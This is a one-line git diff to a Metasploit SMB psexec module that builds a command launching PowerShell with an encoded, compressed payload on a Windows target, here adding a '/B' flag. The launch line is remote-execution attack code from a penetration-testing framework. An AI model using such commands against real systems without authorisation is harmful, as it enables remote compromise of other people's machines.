diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 666181292e..a1dc9261d1 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -270,6 +270,6 @@ class Metasploit3 < Msf::Exploit::Remote psh_payload = compress_script(psh_payload) # Determine appropriate architecture ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe' - command = "%COMSPEC% /C start #{ps_bin} -EncodedCommand #{psh_payload}" + command = "%COMSPEC% /B /C start #{ps_bin} -EncodedCommand #{psh_payload}" end end